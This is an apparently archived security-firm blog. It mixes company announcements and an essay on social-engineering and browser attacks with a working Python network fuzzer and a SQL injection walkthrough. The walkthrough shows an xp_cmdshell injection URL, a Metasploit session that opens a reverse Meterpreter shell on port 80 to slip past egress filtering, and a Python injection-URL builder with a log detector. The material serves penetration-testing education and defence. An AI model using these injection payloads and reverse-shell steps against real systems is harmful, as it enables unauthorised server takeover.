Archive for the ‘SECFORCE’ Category
Is traditional penetration testing effective at identifying risk?
Friday, December 14th, 2012
This September the Director General of GCHQ wrote to many business leaders providing them with a top ten list of priorities for achieving and maintaining a strong resilience to cyber attack.
The challenge for many board members is how to ascertain the validity of what they are being told in relation to the health of their defences. What unknown risks are being carried? There is a high risk of false assurance from internal departments reporting up the chain.
What state is your business in when it comes to cyber security?
Ask yourself the following questions:
· How effective are my perimeter defences?
· How much business impact can an anonymous attacker cause on my network?
· What is the state of health of my internal systems and networks?
· What level of security awareness is held by my staff?
· How effective are my IT and security teams at identifying and mitigating an attack?
If you are sure you know the answer and you are happy with it then you are doing well.
Many of the security assessments we are asked to undertake, although they provide value, miss the point when it comes to identifying key risks. The reason is that an advanced and sophisticated attacker would not play by the rules set out in a typical test engagement. If I wanted to attack your organisation, I would carefully target your people, compromise their browsers, infiltrate their laptops or workstations, and from there slowly gain a foothold and control of your network. In my 10 years working at the cutting edge of penetration testing, we have performed this kind of test only a handful of times; however, the majority of successful intrusions use exactly this method.
There is a mismatch, therefore: the skills exist to measure an organisation's resilience to this attack method, and the majority of successful breaches use this technique, yet penetration tests typically do not cater for this scenario.
A realistic attack would take the form of a discrete engagement to identify and quantify key areas of critical risk. We like to call it offensive security: the best form of defence is to know what the enemy is capable of. If you want to know the truth, you need a test that combines the following elements:
· Physical: how easy would it be for an individual to gain access to one of your premises, gain access to the network, or steal a laptop, PDA or similar device (and attempt to extract the data from it)? Can a remote access device be planted, and would it go unnoticed?
· Technical: can your systems be penetrated? How effective are your perimeter and internal controls?
· Social: can your people be easily compromised, and what level of control over your systems, data and networks can be achieved through them?
So to ask the question again – how well equipped are you for fending off an advanced and persistent cyber attack?
SECFORCE presented at the IGEM conference
Wednesday, November 14th, 2012
The gas and energy sectors face significant IT security challenges. In an evolving industry that has become dependent on IT systems, that is a potential target of terrorist attacks, and where high availability and business continuity are a must, IT security should not be overlooked.
SECFORCE presented the challenges faced by gas and energy corporations at the IGEM annual conference.
The talk gave an overview of the threats to companies in the energy sector, the current threats affecting SCADA systems, attackers' motivations and a roadmap towards improved security.
Should you protect your identity from cybercriminals and would-be penetration testers?
Monday, October 29th, 2012
Andy Smith, an internet security chief at the Cabinet Office, has said people should only give accurate details to trusted sites such as government ones. (http://www.bbc.co.uk/news/uk-politics-20082493)
Giving fake details to social networking sites is “a very sensible thing to do”
The reason is the high volume of websites that ask their users for sensitive information, such as date of birth, where this information is not strictly necessary. Because of the vast number of websites involved, keeping an individual's information confidential is becoming virtually impossible.
As an individual working for a well-respected penetration testing company, I see the effects of this on a daily basis when SECFORCE is asked to perform social engineering attacks and client-side browser exploitation against unsuspecting company employees. For us, without the rich source of information leakage about organisations' employees in social media and other websites, our job of either tricking the user, or using their identity to trick others, would be much harder.
The trick with a client-side attack is to encourage an individual to perform an action of some kind; the chances of success are greatly increased if you use specific information pertaining to that user that puts them at ease and elevates their misplaced trust in you, 'the attacker'. This is why social media is so powerful: a message from a friend on Facebook, an email from a colleague on LinkedIn, each containing a specific piece of information (for example a happy birthday message on your birthday) and prompting an action to click or download, such as 'here is a picture of your daughter from the party last weekend' or 'good luck with the presentation today'.
Messages that are backed by some truth and privileged information are likely to achieve the desired result: compromise of the user.
Cyber criminals have exactly the same access to this information as legitimate penetration testers, and they are putting it to good use. Client-side browser attacks are increasing rapidly. The attacker's goal is often to establish a bridgehead into an organisation from which to cause further significant impact. This form of attack can be sustained against an organisation and its employees for months, so the odds of success are on the side of the attacker, and the only real countermeasures are the awareness and vigilance of your employees.
So, is Andy Smith from the Cabinet Office right to give this advice? There are clearly a number of challenges in protecting an individual's identity online; at the same time, websites such as Facebook, Twitter and LinkedIn, as well as the hundreds of others that store information on you, are here to stay. We are at a point of transition: not fully equipped for, or aware of, the risks our online behaviour exposes us to, but at the same time reliant on the benefits this new technology brings to our lives.
SECFORCE achieves ISO27001:2005
Thursday, October 11th, 2012
SECFORCE has been certified to ISO27001:2005 by the British Assessment Bureau.
SECFORCE’s Operations and Commercial Director Sam Temple said:
“This marks an important milestone for us in security management. It is one thing to strive to operate in a secure manner, but fantastic to have it confirmed by a respected external auditing body. Having achieved ISO27001 does not mean that we can relax about our security, though; although we can be confident that the systems and procedures put in place are effective now, we will continue to invest effort into this area to ensure that they remain so.”
SECFORCE handles confidential information on a daily basis. This achievement helps ensure that our clients' information is kept secure.
SECFORCE Presents to European Banking Industry in Riederau
Wednesday, October 3rd, 2012
SECFORCE Technical Director Rodrigo Marcos impressed bankers at an IT cyber-security workshop in Germany on Tuesday, treating them to a live hacking demonstration. The presentation comes as financial institutions focus more and more on how to foil the dangerous and cutting-edge cyber criminals hiding behind their computer screens around the globe.
During the two-day conference, Marcos demonstrated how an unsuspecting online banking customer could be targeted and their life savings stolen without them even noticing that their browser had been compromised.
“It is not common to see competitors in the same industry sharing information security knowledge and organising events like this one. To my mind, it clearly shows the increasing security awareness in the market today.” said Rodrigo Marcos.
The experienced ethical hacker also advised the banks to provide more security tips to their customers such as opening a new browser session when conducting online banking.
Proxyfuzz fuzzer RPM binary
Thursday, September 22nd, 2011
Proxyfuzz is now available in RPM format for Fedora users. Petr Sklenar has created and uploaded the RPM version, which is available for download here.
Source code and Windows binaries can still be found in the security research section of our website.
Proxyfuzz is a protocol-agnostic fuzzer that randomly fuzzes network traffic using a man-in-the-middle approach. The tool sits between client and server and randomly injects a number of fuzzing signatures into the data that passes through it. It is very easy to set up and can be used to research any TCP or UDP protocol.
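As an added illustration of the man-in-the-middle fuzzing approach described above (this is my own example, not Proxyfuzz's source code), the following Python proxy accepts a client connection, connects onward to the real server, and randomly inserts or overwrites fuzz signatures in the client-to-server stream while passing the server's replies through untouched. The signature list, the names and the mutation rate are assumptions made for the example; it covers TCP only, where Proxyfuzz also handles UDP.

```python
"""Tiny protocol-agnostic TCP man-in-the-middle fuzzer.

Added illustration, not Proxyfuzz's own source: clients connect to LISTEN,
the proxy connects onward to TARGET and randomly injects fuzz signatures
into the client-to-server stream. The signature list and all names are
assumptions made for this example.
"""
import random
import socket
import threading

# Assumed signature set: the sort of strings a generic fuzzer injects.
# Proxyfuzz's real list is not reproduced here.
FUZZ_SIGNATURES = [
    b"A" * 1024,                 # long string: fixed-size stack buffers
    b"A" * 65535,                # very long string: heap and length-field handling
    b"%s%s%s%s%n",               # format-string specifiers
    b"%x" * 32,
    b"\x00",                     # embedded NUL: C string truncation
    b"\xff\xff\xff\xff",         # -1 / UINT_MAX as a binary length field
    b"-1", b"0", b"2147483648",  # integer boundaries as text
    b"../../../../etc/passwd",   # path traversal
    b"'; --",                    # SQL metacharacters
    b"\r\n\r\n",                 # premature end of headers in text protocols
]


def fuzz(data: bytes, rng: random.Random, rate: float = 0.3, max_inserts: int = 3) -> bytes:
    """Return `data` with 1..max_inserts signatures randomly inserted or
    overwritten, or untouched with probability 1 - rate.
    The output is never shorter than the input."""
    if not data or rate <= 0.0 or rng.random() >= rate:
        return data
    out = bytearray(data)
    for _ in range(rng.randint(1, max_inserts)):
        sig = rng.choice(FUZZ_SIGNATURES)
        pos = rng.randint(0, len(out))
        if rng.random() < 0.5:
            out[pos:pos] = sig                 # insert, shifting the rest
        else:
            out[pos:pos + len(sig)] = sig      # overwrite in place (may extend past the end)
    return bytes(out)


def fuzz_with_seed(data: bytes, seed: int, rate: float = 0.3) -> bytes:
    """Deterministic wrapper: the same seed reproduces the same mutation,
    which is what lets a crash found by random fuzzing be replayed."""
    return fuzz(data, random.Random(seed), rate)


def pump(src: socket.socket, dst: socket.socket, rng=None, rate: float = 0.3) -> None:
    """Copy bytes src -> dst until EOF, mutating each chunk when an rng is given."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(fuzz(chunk, rng, rate) if rng is not None else chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)   # propagate EOF to the other side
        except OSError:
            pass


def handle(client: socket.socket, target, seed, rate: float) -> None:
    """One proxied connection: client->server is fuzzed, server->client is passed through."""
    server = socket.create_connection(target)
    rng = random.Random(seed)
    up = threading.Thread(target=pump, args=(client, server, rng, rate), daemon=True)
    up.start()
    pump(server, client)
    up.join()
    client.close()
    server.close()


def serve(listen, target, seed=None, rate: float = 0.3) -> None:
    """Accept connections on `listen` and proxy each one to `target` in its own thread."""
    ls = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ls.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    ls.bind(listen)
    ls.listen(5)
    while True:
        conn, _ = ls.accept()
        threading.Thread(target=handle, args=(conn, target, seed, rate), daemon=True).start()


if __name__ == "__main__":
    # Point the client under test at 127.0.0.1:8080; the real service listens on 127.0.0.1:8000.
    serve(("127.0.0.1", 8080), ("127.0.0.1", 8000), seed=1)
```

Point the client under test at the listening port and run the server under a debugger or crash monitor. Because the mutation is random, the seed is the thing to record: the same seed and rate reproduce the same byte stream for a connection, so a crash can be replayed. With seed=None every connection draws fresh OS entropy, which explores more but reproduces nothing.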
SECFORCE is now CREST certified
Monday, July 25th, 2011
As part of SECFORCE's commitment to providing high-quality services, SECFORCE has now achieved CREST certification. This further complements our existing methodology and code of ethics.
SECFORCE is already recognised as one of the leading penetration testing service providers in both the UK and Europe with the ability to demonstrate expertise and professionalism to ensure clients are totally satisfied.
CREST Penetration Testing
“CREST is a not-for-profit organisation which brings a demonstrable level of expertise and professionalism to the security and penetration testing market. The bar for entry is set very high to protect the interests of the buying community and provide a clear differentiator for professional testing companies. There are very few companies in the UK who can meet the requirements of CREST, and those that do, like SECFORCE, have had to demonstrate that the processes they utilise for testing are sound, that they have adopted industry best practice in their approach to testing and that they handle sensitive client information in an appropriate manner.”
Ian Glover, President of CREST
The addition of CREST certification will provide further reassurance and confidence to the many clients where SECFORCE has already built a strong working relationship.
“We are really pleased that CREST certification has been achieved and view this as an important step forward in the continued enhancement of our service delivery.”
Rodrigo Marcos, Technical Services Director
For more information about our CREST assessments, and to discover how we can benefit your organisation, please visit our CREST penetration testing page.
SECFORCE invited to present at Athcon
Saturday, June 18th, 2011
SECFORCE was invited to present at the Athcon conference, held in Athens on 2nd and 3rd June 2011.
AthCon is an annual IT security conference that takes place in Athens, Greece, designed to give a technical insight into the world of IT security: a realistic, practical view of current and evolving threats and security trends, presented by top international security experts.
SECFORCE presented a talk called “What you didn’t know about Metasploit”, covering the history of the Metasploit Framework, architecture, exploitation and post-exploitation features.
The Metasploit Framework is mainly used for exploitation purposes during penetration testing engagements.
You can download the slides from the talk from our security research area.
SECFORCE achieves quality management ISO 9001 certification
Wednesday, April 6th, 2011
SECFORCE has achieved recognition for its quality management systems with the award of ISO 9001:2008.
The certification recognises the company’s commitment to quality management systems used in the delivery of IT security services to SECFORCE customers and to continuous improvement processes and procedures.
For customers, this achievement enhances confidence in the high quality of SECFORCE's services and supports a more efficient and effective business operation, increasing customer satisfaction. As quality is constantly measured and procedures ensure that corrective actions are taken whenever defects occur, our clients benefit from a continually improving service.
Certification was awarded by the British Assessment Bureau, a UKAS-accredited body, following a series of independent audits.
Exploiting SQL injection vulnerabilities with Metasploit
Thursday, January 27th, 2011
In this post we show how to exploit a SQL injection vulnerability in a web application with a Microsoft SQL Server backend where xp_cmdshell is available to the attacker.
Suppose that during a penetration test of a web application it is identified that the application is vulnerable to SQL injection and that the tester can execute administrative stored procedures:
http://192.168.1.66/showproduct.asp?id=1;exec master..xp_cmdshell 'ping 192.168.1.64';--
If the request above succeeds (an ICMP echo request from 192.168.1.66 arriving at 192.168.1.64 confirms it), arbitrary commands can be executed on the database host. At this point there are a number of options that would allow the tester to fully compromise the server, and there are public tools that automate the takeover. This post covers the use of a Metasploit module.
The mssql_payload_sqli module will execute any Windows payload on the target host. In this example we use Meterpreter, one of the payloads that gives the penetration tester the most flexibility.
It is necessary to specify the exact point of the SQL injection. This is done through the GET_PATH option, which takes the vulnerable URL with an [SQLi] token marking the injection point; for the URL above that is http://192.168.1.66/showproduct.asp?id=1;[SQLi];-- (the session below shows it shortened to the host). The token is where the module places the SQL that delivers and runs the payload. The rest of the exploitation process is the same as for any other vulnerability; this is the exploitation of the URL shown above:
msf > use windows/mssql/mssql_payload_sqli
msf exploit(mssql_payload_sqli) > set GET_PATH http://192.168.1.66/
GET_PATH => http://192.168.1.66/
msf exploit(mssql_payload_sqli) > set RHOST 192.168.1.66
RHOST => 192.168.1.66
msf exploit(mssql_payload_sqli) > set PAYLOAD windows/patchupmeterpreter/reverse_tcp
PAYLOAD => windows/patchupmeterpreter/reverse_tcp
msf exploit(mssql_payload_sqli) > set LHOST 192.168.1.64
LHOST => 192.168.1.64
msf exploit(mssql_payload_sqli) > set LPORT 80
LPORT => 80
msf exploit(mssql_payload_sqli) > exploit
After exploitation the attacker gets a Meterpreter shell. Choosing LPORT 80 makes the reverse connection from the database server look like outbound web traffic, which egress filtering commonly allows.
SQL injection exploitation with Metasploit
If you want to use this module, you can download it from the SECFORCE security tools repository.
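As an added example that is not part of the original post and not the module's own code, the following Python shows both sides of the technique: it builds the request that a GET_PATH with the [SQLi] token describes, substituting a percent-encoded stacked xp_cmdshell call for the token, and it scans IIS W3C log lines for such requests. The SQL the Metasploit module actually injects to deliver its payload is not reproduced here; the log lines are constructed and the function names are my own.

```python
"""SQL injection to xp_cmdshell: request builder and IIS log detector.

Added illustration, not the Metasploit module's source. The [SQLi] token
convention follows the module's GET_PATH option as described in the post;
the SQL the module really injects is not reproduced. Log lines are
constructed and all function names are assumptions made for this example.
"""
import re
from urllib.parse import quote, unquote_plus, urlsplit

INJECTION_TOKEN = "[SQLi]"


def xp_cmdshell_sql(command: str) -> str:
    """Stacked-query fragment that runs `command` through xp_cmdshell.
    Single quotes inside the command are doubled so the T-SQL string
    literal stays balanced (otherwise the statement fails to parse)."""
    return "exec master..xp_cmdshell '%s'" % command.replace("'", "''")


def build_injection_url(get_path: str, sql: str) -> str:
    """Substitute percent-encoded SQL for the [SQLi] token in a GET_PATH-style URL."""
    if INJECTION_TOKEN not in get_path:
        raise ValueError("GET_PATH must mark the injection point with [SQLi]")
    return get_path.replace(INJECTION_TOKEN, quote(sql, safe=""))


# Detection side: a stacked query (";" then EXEC/EXECUTE) reaching xp_cmdshell,
# with or without the master.. / master.dbo. prefix, case-insensitive.
STACKED_XP_CMDSHELL = re.compile(
    r";\s*(?:exec|execute)\s+(?:master\.{1,2})?(?:dbo\.)?xp_cmdshell\b", re.I)


def query_is_xp_cmdshell_attempt(raw_query: str) -> bool:
    """Decode %XX and '+' once, then look for the stacked xp_cmdshell call."""
    return STACKED_XP_CMDSHELL.search(unquote_plus(raw_query)) is not None


def url_is_xp_cmdshell_attempt(url: str) -> bool:
    return query_is_xp_cmdshell_attempt(urlsplit(url).query)


def scan_iis_log(lines):
    """Scan IIS W3C log lines (field order as in the #Fields header below)
    and return (client_ip, decoded_query) for every xp_cmdshell attempt."""
    hits = []
    for line in lines:
        if not line or line.startswith("#"):
            continue
        f = line.split()
        if len(f) < 9 or f[5] == "-":
            continue
        query, client_ip = f[5], f[8]
        if query_is_xp_cmdshell_attempt(query):
            hits.append((client_ip, unquote_plus(query)))
    return hits


# Constructed sample log: a benign request, two injection attempts in
# different encodings, and another benign request.
SAMPLE_IIS_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2011-01-27 10:15:02 192.168.1.66 GET /showproduct.asp id=1 80 - 192.168.1.64 Mozilla/5.0 200
2011-01-27 10:15:09 192.168.1.66 GET /showproduct.asp id=1;exec+master..xp_cmdshell+'ping+192.168.1.64';-- 80 - 192.168.1.64 Mozilla/5.0 200
2011-01-27 10:15:31 192.168.1.66 GET /showproduct.asp id=1%3BEXECUTE%20master.dbo.xp_cmdshell%20%27dir%27%3B-- 80 - 192.168.1.64 Mozilla/5.0 500
2011-01-27 10:16:00 192.168.1.66 GET /showproduct.asp id=2 80 - 10.0.0.7 Mozilla/5.0 200
""".splitlines()


if __name__ == "__main__":
    url = build_injection_url("http://192.168.1.66/showproduct.asp?id=1;[SQLi];--",
                              xp_cmdshell_sql("ping 192.168.1.64"))
    print(url)
    for ip, q in scan_iis_log(SAMPLE_IIS_LOG):
        print("xp_cmdshell attempt from", ip, "->", q)
```

The detector matches the stacked-query form used in this post after one round of URL decoding; an attacker can evade it with CHAR() concatenation, comments between tokens or other encodings, so treat it as a triage signal rather than a control. The durable fix is on the database side: run the application under a low-privilege login that is not sysadmin, leave xp_cmdshell disabled (EXEC sp_configure 'xp_cmdshell', 0 after enabling 'show advanced options'), and parameterise the query behind showproduct.asp so the id value can never become SQL.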